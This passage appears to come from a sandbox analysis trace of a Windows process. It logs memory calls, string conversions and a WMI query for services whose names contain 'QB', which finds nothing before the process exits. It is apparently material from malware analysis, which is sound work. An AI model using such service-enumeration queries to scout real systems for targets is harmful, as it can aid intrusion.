| out: ppInSignature=0x2b0f7a4*=0x0, ppOutSignature=0x2b0f784*=0x2f14ef0) returned 0x0 [0314.467] free (_Block=0x2c8ae70) [0314.467] IUnknown:Release (This=0x2f14ef0) returned 0x0 [0314.467] IUnknown:Release (This=0x2f122c0) returned 0x0 [0314.467] ??0CHString@@QAE@XZ () returned 0x2b0f668 [0314.467] GetCurrentThreadId () returned 0xe10 [0314.467] malloc (_Size=0xc) returned 0x2c8aeb8 [0314.467] lstrlenA (lpString="") returned 0 [0314.468] malloc (_Size=0x2) returned 0x2c82788 [0314.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2c82788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0314.468] free (_Block=0x2c82788) [0314.468] malloc (_Size=0xc) returned 0x2c8aed0 [0314.468] lstrlenA (lpString="") returned 0 [0314.468] malloc (_Size=0x2) returned 0x2c82788 [0314.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2c82788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0314.468] free (_Block=0x2c82788) [0314.468] malloc (_Size=0xc) returned 0x2c8ae70 [0314.468] free (_Block=0x2c8aed0) [0314.468] malloc (_Size=0xc) returned 0x2c8aed0 [0314.468] lstrlenA (lpString="SELECT * FROM ") returned 14 [0314.468] malloc (_Size=0x1e) returned 0x2c8caa8 [0314.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x2c8caa8, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0314.468] free (_Block=0x2c8caa8) [0314.468] malloc (_Size=0xc) returned 0x2c89958 [0314.468] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0314.468] SysStringLen (param_1="Win32_Service") returned 0xd [0314.468] free (_Block=0x2c8aed0) [0314.468] malloc (_Size=0xc) returned 0x2c8aed0 [0314.468] malloc (_Size=0xc) returned 0x2c8cf30 [0314.468] lstrlenA (lpString=" WHERE ") returned 7 [0314.468] malloc (_Size=0x10) returned 0x2c8cf48 [0314.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x2c8cf48, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0314.468] free (_Block=0x2c8cf48) [0314.468] malloc (_Size=0xc) returned 0x2c8cf18 [0314.469] SysStringLen (param_1=" WHERE ") returned 0x7 [0314.469] SysStringLen (param_1="name like '%%QB%%'") returned 0x12 [0314.469] malloc (_Size=0xc) returned 0x2c8cfd8 [0314.469] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0314.469] SysStringLen (param_1=" WHERE name like '%%QB%%'") returned 0x19 [0314.469] free (_Block=0x2c89958) [0314.469] free (_Block=0x2c8cf18) [0314.469] free (_Block=0x2c8cf30) [0314.469] free (_Block=0x2c8aed0) [0314.469] malloc (_Size=0xc) returned 0x2c8cf18 [0314.469] IWbemServices:ExecQuery (in: This=0x2ee7690, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%QB%%'", lFlags=48, pCtx=0x0, ppEnum=0x2b0f674 | out: ppEnum=0x2b0f674*=0x2f158a0) returned 0x0 [0314.472] free (_Block=0x2c8cf18) [0314.472] CoSetProxyBlanket (pProxy=0x2f158a0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0314.482] IEnumWbemClassObject:Next (in: This=0x2f158a0, lTimeout=-1, uCount=0x1, apObjects=0x2b0f670, puReturned=0x2b0f660 | out: apObjects=0x2b0f670*=0x0, puReturned=0x2b0f660*=0x0) returned 0x1 [0315.557] IUnknown:Release (This=0x2f158a0) returned 0x0 [0315.560] free (_Block=0x2c8cfd8) [0315.560] free (_Block=0x2c8ae70) [0315.560] free (_Block=0x2c8aeb8) [0315.560] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0315.560] free (_Block=0x2c8aea0) [0315.560] free (_Block=0x2c8ca08) [0315.560] free (_Block=0x2c8c9c8) [0315.560] free (_Block=0x2c8c988) [0315.560] free (_Block=0x2c8c958) [0315.560] free (_Block=0x2c8c928) [0315.560] free (_Block=0x2c8ca78) [0315.560] free (_Block=0x2c8ca38) [0315.560] free (_Block=0x2c8c8e8) [0315.560] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0315.560] GetCurrentThreadId () returned 0xe10 [0315.560] ??0CHString@@QAE@PBG@Z () returned 0x2b0f828 [0315.560] ??YCHString@@QAEABV0@PBG@Z () returned 0x2b0f828 [0315.560] malloc (_Size=0x800) returned 0x2c8cff0 [0315.560] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x2c8cff0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0315.561] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0315.561] malloc (_Size=0x1c) returned 0x2c8c8e8 [0315.561] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x2c8c8e8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0315.561] __iob_func () returned 0x776f2608 [0315.561] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0315.561] __iob_func () returned 0x776f2608 [0315.561] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0315.561] free (_Block=0x2c8c8e8) [0315.561] free (_Block=0x2c8cff0) [0315.561] ??1CHString@@QAE@XZ () returned 0x1 [0315.561] WbemLocator:IUnknown:Release (This=0x2ee7690) returned 0x0 [0315.562] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0315.562] _kbhit () returned 0x0 [0315.690] free (_Block=0x2c8b180) [0315.690] free (_Block=0x2c8ac78) [0315.690] free (_Block=0x2c8ac60) [0315.690] free (_Block=0x2c8abb8) [0315.690] free (_Block=0x2c8ab58) [0315.690] free (_Block=0x2c8b048) [0315.690] free (_Block=0x2c8b158) [0315.690] free (_Block=0x2c89da8) [0315.690] free (_Block=0x2c8b1c8) [0315.690] free (_Block=0x2c8ade0) [0315.690] free (_Block=0x2c82a30) [0315.690] free (_Block=0x2c80520) [0315.690] free (_Block=0x2c8cbb8) [0315.690] free (_Block=0x2c8ab70) [0315.690] free (_Block=0x2c8ae10) [0315.690] free (_Block=0x2c8cb78) [0315.690] free (_Block=0x2c8cb38) [0315.690] free (_Block=0x2c8ae88) [0315.690] free (_Block=0x2c8ae28) [0315.690] free (_Block=0x2c8ae40) [0315.690] free (_Block=0x2c8cb08) [0315.690] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0315.690] free (_Block=0x2c8b0d0) [0315.690] free (_Block=0x2c8ac90) [0315.691] free (_Block=0x2c80568) [0315.691] free (_Block=0x2c8adf8) [0315.691] free (_Block=0x2c8b190) [0315.691] free (_Block=0x2c8ab88) [0315.691] free (_Block=0x2c82a10) [0315.691] free (_Block=0x2c826b0) [0315.691] free (_Block=0x2c826f8) [0315.691] free (_Block=0x2c82740) [0315.691] free (_Block=0x2c8ae58) [0315.691] free (_Block=0x2c827c8) [0315.691] free (_Block=0x2c80508) [0315.691] free (_Block=0x2c82b10) [0315.691] free (_Block=0x2c804f0) [0315.691] free (_Block=0x2c82af0) [0315.691] free (_Block=0x2c804d8) [0315.691] free (_Block=0x2c82b50) [0315.691] free (_Block=0x2c828f8) [0315.691] free (_Block=0x2c82910) [0315.691] free (_Block=0x2c828c0) [0315.691] free (_Block=0x2c828d8) [0315.691] free (_Block=0x2c82930) [0315.691] free (_Block=0x2c82948) [0315.691] free (_Block=0x2c804a0) [0315.691] free (_Block=0x2c804b8) [0315.691] free (_Block=0x2c82850) [0315.691] free (_Block=0x2c82868) [0315.692] free (_Block=0x2c82818) [0315.692] free (_Block=0x2c82830) [0315.692] free (_Block=0x2c82888) [0315.692] free (_Block=0x2c828a0) [0315.692] free (_Block=0x2c827e0) [0315.692] free (_Block=0x2c827f8) [0315.692] free (_Block=0x2c827a0) [0315.692] free (_Block=0x2c811f0) [0315.692] free (_Block=0x2c8afc0) [0315.692] WbemLocator:IUnknown:Release (This=0x2ea4748) returned 0x2 [0315.692] WbemLocator:IUnknown:Release (This=0x2ebac30) returned 0x0 [0315.693] WbemLocator:IUnknown:Release (This=0x2ea4748) returned 0x1 [0315.693] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0315.693] WbemLocator:IUnknown:Release (This=0x2ea4748) returned 0x0 [0315.693] free (_Block=0x2c8ad80) [0315.693] free (_Block=0x2c8abe8) [0315.693] free (_Block=0x2c82cb0) [0315.693] free (_Block=0x2c8adb0) [0315.693] free (_Block=0x2c8adc8) [0315.693] free (_Block=0x2c82d10) [0315.693] free (_Block=0x2c8ab28) [0315.693] free (_Block=0x2c8aba0) [0315.693] free (_Block=0x2c829b0) [0315.693] free (_Block=0x2c8aca8) [0315.693] free (_Block=0x2c8acf0) [0315.693] free (_Block=0x2c82bf0) [0315.693] free (_Block=0x2c8ac18) [0315.693] free (_Block=0x2c8acc0) [0315.693] free (_Block=0x2c82bb0) [0315.693] free (_Block=0x2c8ad50) [0315.693] free (_Block=0x2c8acd8) [0315.693] free (_Block=0x2c82bd0) [0315.693] free (_Block=0x2c8ac48) [0315.694] free (_Block=0x2c8ad20) [0315.694] free (_Block=0x2c82c50) [0315.694] free (_Block=0x2c8ad68) [0315.694] free (_Block=0x2c8ab40) [0315.694] free (_Block=0x2c82c70) [0315.694] free (_Block=0x2c89988) [0315.694] free (_Block=0x2c8ac00) [0315.694] free (_Block=0x2c82c30) [0315.694] free (_Block=0x2c8ab10) [0315.694] free (_Block=0x2c8ad98) [0315.694] free (_Block=0x2c82b90) [0315.694] free (_Block=0x2c8ac30) [0315.694] free (_Block=0x2c8ad08) [0315.694] free (_Block=0x2c82c10) [0315.694] free (_Block=0x2c8abd0) [0315.694] free (_Block=0x2c8ad38) [0315.694] free (_Block=0x2c82c90) [0315.694] free (_Block=0x2c89808) [0315.694] free (_Block=0x2c89928) [0315.694] free (_Block=0x2c82cf0) [0315.694] free (_Block=0x2c899a0) [0315.694] free (_Block=0x2c897f0) [0315.695] free (_Block=0x2c82d50) [0315.695] free (_Block=0x2c898c8) [0315.695] free (_Block=0x2c89838) [0315.695] free (_Block=0x2c82d30) [0315.695] free (_Block=0x2c89820) [0315.695] free (_Block=0x2c89880) [0315.695] free (_Block=0x2c82b30) [0315.695] free (_Block=0x2c899b8) [0315.695] free (_Block=0x2c898b0) [0315.695] free (_Block=0x2c82b70) [0315.695] free (_Block=0x2c89898) [0315.695] free (_Block=0x2c89850) [0315.695] free (_Block=0x2c82990) [0315.695] free (_Block=0x2c89910) [0315.695] free (_Block=0x2c89940) [0315.695] free (_Block=0x2c82ab0) [0315.695] free (_Block=0x2c89970) [0315.695] free (_Block=0x2c89868) [0315.695] free (_Block=0x2c82cd0) [0315.695] free (_Block=0x2c898e0) [0315.695] free (_Block=0x2c898f8) [0315.695] free (_Block=0x2c82ad0) [0315.696] CoUninitialize () [0315.767] exit (_Code=0) [0315.767] free (_Block=0x2c8aee8) [0315.767] free (_Block=0x2c80ff8) [0315.767] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0315.767] free (_Block=0x2c82e00) [0315.767] free (_Block=0x2c81218) [0315.767] free (_Block=0x2c80fd8) [0315.768] free (_Block=0x2c80fb8) [0315.768] free (_Block=0x2c80f88) [0315.768] free (_Block=0x2c80f68) [0315.768] free (_Block=0x2c80f38) [0315.768] free (_Block=0x2c80ef8) [0315.768] free (_Block=0x2c80ed8) [0315.768] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0315.768] free (_Block=0x2c829d0) Thread: id = 333 os_tid = 0xe20 Thread: id = 334 os_tid = 0xe2c Thread: id = 335 os_tid = 0xe30 Thread: id = 336 os_tid = 0xe24